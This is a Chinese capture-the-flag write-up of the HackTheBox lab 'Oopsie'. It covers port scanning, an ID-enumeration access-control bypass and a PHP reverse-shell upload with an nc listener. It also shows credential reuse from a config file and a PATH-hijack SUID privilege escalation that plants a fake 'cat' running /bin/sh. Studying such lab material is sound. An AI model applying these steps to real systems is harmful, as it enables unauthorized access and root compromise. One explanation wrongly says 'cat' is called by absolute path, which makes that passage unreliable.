HackerTheBox之Oopsie9

注意&＃xff1a;我这机器的IP用了两个&＃xff0c;

第一个10.129.226.120。

第二个10.129.228.3。

&＃xff08;中途吃个饭&＃xff0c;openvpn断了&＃xff0c;机器重置&＃xff0c;文章也弄到一大把了就没重做了&＃xff09;

信息收集

还是老规矩&＃xff0c;先用nmap扫一下&＃xff0c;开启什么端口

nmap -v -sS -sV 10.129.226.120


发现开启的是22 和80 端口

先访问一波

随便浏览了一下&＃xff0c;没啥发现

路径泄露

打开bp看看能不能有什么发现

发现登录窗口

http://10.129.226.120/cdn-cgi/login/


这里的账号是admin
密码是上一个场景已经获得的MEGACORP_4dm1n!!
登录后跳转到门户页面
&＃xff08;其实这一步我也没想到&＃xff0c;查看官方wp后也是一脸懵逼&＃xff09;
&＃xff08;But there is also an option to Login as Guest . Trying that and now we are presented with couple of new
navigation options as we are logged in as Guest:
但也有一个选择以来宾身份登录。
尝试一下&＃xff0c;现在我们看到了一些新的
作为来宾登录时的导航选项&＃xff1a;
&＃xff09;
有没有大佬解惑一下

 越权

简单浏览一下&＃xff0c;发现Upload选项&＃xff0c;但是需要Super Admin权限才行

 同时也发现在Accounts板块中存在来宾用户和id&＃61;2

10.129.226.120/cdn-cgi/login/admin.php?content&＃61;accounts&id&＃61;2

瞎测试一下id&＃61;1

10.129.226.120/cdn-cgi/login/admin.php?content&＃61;accounts&id&＃61;1

 发现存在admin用户&＃xff0c;那这思路就明确了

同时抓报&＃xff0c;也能验证我们的思路&＃xff0c;用COOKIE 的id来标识身份权限 

  即如 34322 &＃61; admin    2233 &＃61; guest

尝试遍历&＃xff0c;能不能发现超级管理员身份

在终端内用循环生成数字1~100到date.txt里

for i in &＃96;seq 1 100&＃96;; do echo $i >>date.txt;done;


接下来将Accounts板块的包&＃xff0c;使用burp suite的Intruder模块进行自动化攻击

调试参数

 然后运行&＃xff0c;在结果里发现我们想要的id了

 我这因为bp存在&＃xff08;嵌入式浏览器初始化失败&＃xff09;所有直接访问

成功获得super admin 的Access ID 为 86575

文件上传

将kali中自带的shell提取到桌面

cp /usr/share/webshells/php/php-reverse-shell.php ~/桌面

vim 修改本机地址和监听端口

采用kali自带的dirbuster进行扫描 &＃xff0c;寻找上传路径&＃xff08;在kali中扫描字典的默认位置是/usr/share/wordlists/dirbuster&＃xff09;

根据扫描的结果猜测上传的文件在http://10.129.228.3/uploads/下

上传webs hell &＃xff08;在这有个魔鬼细节&＃xff0c;&＃xff0c;就是记得加上文件name&＃xff0c;不然一定会触发失败&＃xff09;

启用netcat监听设置的端口来接收webshell

nc -nvvp 1234


访问链接来触发php从而反弹webshell

切回nc的终端&＃xff0c;nc成功接收到webshell&＃xff0c;反弹webshell成功

升级shell &＃xff08;在这查阅了另外一个大佬的资料&＃xff0c;做了升级shell&＃xff09;

        交互式模式就是shell等待你的输入&＃xff0c;并且立即执行你提交的命令&＃xff0c;退出后才终止
        非交互式模式就是以shell script方式执行&＃xff0c;shell不与你进行交互&＃xff0c;而是读取存放在文件中的命令并执行它们&＃xff0c;读取到结尾就终止

SHELL&＃61;/bin/bash script -q /dev/null //见注解1
Ctrl-Z //见注解2
stty raw -echo //见注解3
fg //见注解4
reset //见注解5
xterm //见注解6

1.将在环境变量下将shell设置为/bin/bash且参数为-q和/dev/null的情况下运行脚本&＃xff0c;

-q参数为静默运行&＃xff0c;输出到/dev/null&＃xff08;黑洞&＃xff09;里&＃xff0c;如果不加script -q /dev/null不会新启一个bash&＃xff0c;shell&＃61;/bin/bash只是设置shell为bash&＃xff0c;加了以后会给你挂起一个新的shell&＃xff0c;并帮你记录所有内容
2.将netcat暂挂至后台
3.将本地终端置于原始模式&＃xff0c;以免干扰远程终端
4.将netcat返回到前台&＃xff0c;注意&＃xff1a;这里不会显示输入的命令
5.重置远程终端&＃xff0c;经测试也可以不进行此操作
6.运行xterm
 

 执行完上述操作后&＃xff0c;我们会获得一个交互式的shell&＃xff0c;可以执行su、ctrl&＃43;c等命令&＃xff0c;且可以tab自动补全了

横向移动

翻阅信息发现在/var/www/html/cdn-cgi/login目录中存在一个数据库的连接信息db.php&＃xff0c;
里面包含用户名为robert&＃xff0c;密码为M3g4C0rpUs3r!

在这里可以找到位于robert用户根目录下的user.txt&＃xff0c;拿到User Own的Flag

 提权

可以使用sudo 和 id命令发现robert用户属于bugtracker组&＃xff0c;
我们观察到用户 robert 是组 bugtracker 的一部分。
让我们试试看里面是否有二进制文件


find / -type f -group bugtracker 2>/dev/null //-type f 为查找普通文档&＃xff0c;-group bugtracker 限定查找的组为bugtracker&＃xff0c;2>/dev/null 将错误输出到黑洞&＃xff08;不显示&＃xff09;
ls -al /usr/bin/bugtracker //-al 以长格式方式显示并且显示隐藏文件


注意通常记为 SUID&＃xff08;Set owner User ID&＃xff09;&＃xff0c;用户访问的特殊权限级别只有一个功能&＃xff1a;具有 SUID 的文件始终以拥有该文件的用户身份执行文件&＃xff0c;无论用户传递命令。 如果文件所有者没有执行权限&＃xff0c;然后在此处使用大写的 S。在我们的例子中&＃xff0c;二进制 &＃39;bugtracker&＃39; 归 root 所有&＃xff0c;我们可以以 root 身份执行它&＃xff0c;因为它设置了 SUID。

用strings查看 /usr/bin/bugtracker
发现cat /root/reports/

 1.bugtracker调用系统中的cat命令输出了位于/root/reports/目录下的bug报告&＃xff0c;robert用户本应无权访问/root目录&＃xff0c;而bugtracker设置了setuid后就拥有了/root目录的访问&＃xff0c;就拥有了root权限
2.并且cat命令是使用绝对路径而不是相对路径来调用的&＃xff0c;即在当前用户的环境变量指定的路径中搜寻cat命令&＃xff0c;可以考虑创建一个恶意的cat命令&＃xff0c;并修改当前用户环境变量&＃xff0c;将权限提升为root

export PATH&＃61;/tmp:$PATH //将/tmp目录设置为环境变量
cd /tmp/ //切换到/tmp目录下
echo &＃39;/bin/sh&＃39; > cat //在此构造恶意的cat命令
chmod &＃43;x cat //赋予执行权限


这样bugtracker再次调用cat命令时实际上调用的是/tmp目录下的恶意的cat命令&＃xff0c;
我们运行一下bugtracker可以看出&＃xff0c;此时robert用户临时具有了root权限&＃xff0c;
执行id命令发现只是robert用户的uid变为了root&＃xff0c;不是真正的root用户然后可以找到/root目录下的root.txt拿到SYSTEM OWN的Flag
(需要注意的是此时cat命令已被替换无法读取文件&＃xff0c;可以使用more命令)